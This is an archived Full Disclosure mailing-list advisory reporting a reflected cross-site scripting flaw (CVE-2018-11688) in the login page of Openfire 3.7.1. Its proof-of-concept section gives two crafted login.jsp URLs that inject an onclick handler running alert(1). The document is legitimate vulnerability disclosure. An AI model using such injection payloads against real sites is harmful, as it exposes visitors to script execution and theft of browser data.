[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[FD] Ignite Realtime Openfire Version 3.7.1 Reflected Cross Site Scripting (CVE-2018-11688)
- To: bugtraq@xxxxxxxxxxxxxxxxx, fulldisclosure@xxxxxxxxxxxx
- Subject: [FD] Ignite Realtime Openfire Version 3.7.1 Reflected Cross Site Scripting (CVE-2018-11688)
- From: yavuz atlas <yavatlas@xxxxxxxxx>
- Date: Tue, 5 Jun 2018 17:53:18 +0300
I. VULNERABILITY
-------------------------
Ignite Realtime Openfire Version 3.7.1 Reflected Cross Site Scripting
II. CVE REFERENCE
-------------------------
CVE-2018-11688
III. VENDOR HOMEPAGE
-------------------------
https://www.igniterealtime.org/projects/openfire/
IV. DESCRIPTION
-------------------------
url parameter at Openfire Version 3.7.1 has a reflected cross-site
scripting vulnerability. A successful exploit could allow the attacker
to execute arbitrary script code in the context of the affected site
and allow the attacker to access sensitive browser-based information.
V. PROOF OF CONCEPT
-------------------------
http://domain.net:9090/login.jsp?url=a"onclick="alert(1)
http://domain.net:9090/login.jsp?url=a%22onclick=%22alert(1)
VI. REFERENCES
-------------------------
https://vulmon.com/vulnerabilitydetails?qid=CVE-2018-11688
VII. CREDIT
-------------------------
Yavuz Atlas - @yavuzatlas_
http://www.biznet.com.tr/biznet-guvenlik-duyurulari
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/